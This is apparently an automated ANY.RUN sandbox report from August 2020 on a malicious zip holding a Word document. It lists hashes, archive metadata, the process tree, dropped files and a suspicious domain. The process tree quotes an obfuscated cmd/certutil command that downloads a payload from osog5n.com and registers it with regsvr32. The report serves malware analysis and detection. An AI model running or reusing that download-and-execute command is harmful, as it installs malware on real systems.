File name: | request.zip |
Full analysis: | https://app.any.run/tasks/12baf8d2-be2f-4e7d-9d7f-dcc5bd095003 |
Verdict: | Malicious activity |
Analysis date: | August 08, 2020, 14:38:01 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 6E9392EC2C111D690E781DCEE879B4C5 |
SHA1: | 62515CAF31F1C8DA958D5CA4DF0AD3917A8AA5C5 |
SHA256: | FEBD7B4ACD95578E8FED70DC402EFCBBB4C4B94ADDFE140ED7496EDFD7E8DE10 |
SSDEEP: | 3072:UuGXNpAoedi+g7OQTS86gZlm5SsiGPOeia9ya/:wRedEiWr5EBOBaoa/ |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0009 |
ZipCompression: | Deflated |
ZipModifyDate: | 2020:08:06 04:46:13 |
ZipCRC: | 0x00b89c82 |
ZipCompressedSize: | 96790 |
ZipUncompressedSize: | 105621 |
ZipFileName: | enjoin-08.20.doc |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2880 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\request.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3652 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb2880.32983\enjoin-08.20.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | WinRAR.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
904 | cmd /c "set u=urlcache&&set r=regs&&set s=vr32&&call c:\programdata\1.exe /%u% /f^ http://osog5n.com/pupi/gyru.php?l=taxef2.cab c:\programdata\1.tmp && call %r%%s% c:\programdata\1.tmp" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 2147954407 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3188 | c:\programdata\1.exe /urlcache /f http://osog5n.com/pupi/gyru.php?l=taxef2.cab c:\programdata\1.tmp | c:\programdata\1.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 2147954407 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3652 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3FDE.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2880 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIb2880.32983\enjoin-08.20.doc | document | |
MD5:3ADB31E0339F43F2C054152EB5DFD264 | SHA256:5045E480FBCFF4225282860D6FA6947ADB70D070E37DA0FBA6DAB208120AD73C | |||
3652 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Rar$DIb2880.32983\~$join-08.20.doc | pgc | |
MD5:89FCCD792992EFC9948D97C3D0E95F72 | SHA256:A704AB67D37366E8A4C8B5A8DAD751C42EF3D7D8F548169A75E2200B3B90FE2E | |||
3652 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:4A092BB380AFF054B6D11EF8403F7669 | SHA256:8816330F80570143EDE1850B3EA9D560F318BC307A3EC3859E74ADCEF610FD53 | |||
3652 | WINWORD.EXE | C:\programdata\1.exe | executable | |
MD5:7B973145F7E1B59330CA4DD1F86B3D55 | SHA256:589229E2BD93100049909EDF9825DCE24FF963A0C465D969027DB34E2EB878B4 |
Domain | IP | Reputation |
---|---|---|
osog5n.com |
| suspicious |